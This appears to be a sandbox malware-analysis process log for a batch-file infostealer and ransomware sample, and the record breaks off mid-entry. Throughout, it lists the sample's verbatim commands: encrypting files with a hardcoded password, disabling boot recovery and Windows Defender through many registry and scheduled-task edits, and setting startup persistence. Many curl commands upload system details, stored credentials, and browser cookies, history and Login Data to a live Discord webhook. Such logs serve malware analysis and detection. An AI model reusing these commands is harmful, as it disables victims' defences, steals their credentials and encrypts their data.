System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596479198051286.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:1292

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596479198051286.txt"
4⤵
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "39:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:2028

C:\Windows\system32\findstr.exe
findstr /b "39:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3508

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133611139078670138.txt"
4⤵
PID:116

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133611139078670138.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:3772

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\cmd.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --field-trial-handle=7728,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8232 /prefetch:1
1⤵
PID:3812

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8148,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7856 /prefetch:8
1⤵
PID:2028

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8148,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7856 /prefetch:8
1⤵
PID:4872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --field-trial-handle=3456,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9204 /prefetch:1
1⤵
PID:1472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=9176,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:8
1⤵
PID:628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat"
1⤵
- Checks computer location settings
- Modifies registry class
PID:5312

C:\Windows\system32\chcp.com
chcp 65001
2⤵
PID:1116

C:\Windows\system32\fsutil.exe
fsutil dirty query C:
2⤵
PID:5828

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\vbscript.vbs"
2⤵
- Checks computer location settings
PID:4416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat" "
3⤵
PID:4380

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2924

C:\Windows\system32\fsutil.exe
fsutil dirty query C:
4⤵
PID:4692

C:\Windows\system32\msg.exe
msg * ⚠️ File failed to run correctly (Process aborted)
4⤵
PID:812

C:\Windows\system32\cmd.exe
cmd /c exit 115
4⤵
PID:3592

C:\Windows\system32\attrib.exe
Attrib +h +s +r "C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat"
4⤵
PID:4612

C:\Windows\system32\bcdedit.exe
bcdedit /set recoveryenabled No
4⤵
- Modifies boot configuration data using bcdedit
PID:4872

C:\Windows\system32\bcdedit.exe
bcdedit /set bootstatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:1652

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
4⤵
PID:4976

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
4⤵
PID:6096

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
4⤵
PID:5032

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
4⤵
PID:3688

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
4⤵
PID:1532

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
4⤵
PID:2292

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.Update" /v "Enabled" /t REG_DWORD /d 0 /f
4⤵
PID:2960

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
4⤵
PID:3180

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4964

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:4868

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:6084

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:3924

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6052

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5552

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2496

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4520

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5088

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:4460

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:4892

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:2396

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
4⤵
PID:184

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:6072

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:5584

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:4028

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:700

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:2240

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:4256

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:2444

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
4⤵
PID:3312

C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
4⤵
PID:4416

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
4⤵
PID:1200

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:3996

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:5744

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4372

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4872

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5856

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4976

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:6096

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:5032

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3888

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4884

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:3288

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
4⤵
PID:2292

C:\Windows\system32\taskkill.exe
taskkill /f /IM chrome.exe
4⤵
- Kills process with taskkill
PID:2164

C:\Windows\system32\taskkill.exe
taskkill /F /IM taskmgr.exe
4⤵
- Kills process with taskkill
PID:4868

C:\Windows\system32\timeout.exe
timeout 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:6140

C:\Windows\system32\certutil.exe
certutil -decode cmd.txt "C:\Users\Admin/3D Objects/6669236902340911607.cmd"
4⤵
PID:5600

C:\Windows\system32\timeout.exe
timeout 2 /nobreak
4⤵
PID:1840

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin/3D Objects/6669236902340911607.cmd"
4⤵
PID:3996

C:\Windows\system32\cscript.exe
cscript CS2.vbs
4⤵
- Drops startup file
PID:5000

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\992672351865417544.lnk"
4⤵
- Drops startup file
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL ping -4 -n 1 GYLQWJCN | findstr [
4⤵
PID:5228

C:\Windows\system32\PING.EXE
ping -4 -n 1 GYLQWJCN
5⤵
- Runs ping.exe
PID:3812

C:\Windows\system32\findstr.exe
findstr [
5⤵
PID:4524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
4⤵
PID:3288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-RestMethod api.ipify.org
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2292

C:\Windows\system32\curl.exe
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[ 1. Report from Admin - 10.127.0.105 @ 12:32:18.08 ] \nBatch process started...```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4892

C:\Windows\system32\curl.exe
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[ Version info from Admin - 10.127.0.105 @ 12:32:18.44 ] \n Version - 1.2.0 (MADE BY GHOST.exe)```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2364

C:\Windows\system32\systeminfo.exe
SystemInfo
4⤵
- Gathers system information
PID:4256

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F systeminfo=@"C:\Users\Admin\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4440

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:1532

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\tasklist.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4892

C:\Windows\system32\net.exe
net user
4⤵
PID:6116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
5⤵
PID:6096

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\netuser.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2936

C:\Windows\system32\quser.exe
quser
4⤵
PID:5388

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\quser.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1532

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
4⤵
- Modifies registry key
PID:5248

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\stup.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2808

C:\Windows\system32\cmdkey.exe
cmdkey /list
4⤵
PID:5920

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\cmdkey.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1248

C:\Windows\system32\ipconfig.exe
ipconfig /all
4⤵
- Gathers network information
PID:3832

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\ipconfig.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4580

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MICROSOFT EDGE // from Admin - 10.127.0.105 @ 12:32:24.47```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2960

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F hstry=@"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2020

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3756

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Cookies-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:628

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Network Persistent State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:928

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"NetworkDataMigrated" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5964

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Reporting and NEL" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5308

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Reporting and NEL-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:628

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"SCT Auditing Pending Reports" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:928

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Sdch Dictionaries" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6100

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"TransportSecurity" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5388

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Trust Tokens" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4580

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Trust Tokens-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2060

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME // from Admin - 10.127.0.105 @ 12:32:29.97```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1444

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1248

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Cookies-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2028

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Network Persistent State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6096

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"NetworkDataMigrated" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3652

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Reporting and NEL" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4884

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Reporting and NEL-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6052

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"SCT Auditing Pending Reports" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4740

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"TransportSecurity" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6140

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5288

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:5996

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4528

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1484

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4372

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:2284

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2960

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:3692

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA // from Admin - 10.127.0.105 @ 12:32:40.12```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5736

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3996

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5712

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:1928

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5248

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3924

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3656

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:5000

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- VIVALDI // from Admin - 10.127.0.105 @ 12:32:43.21```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5336

C:\Windows\system32\curl.exe
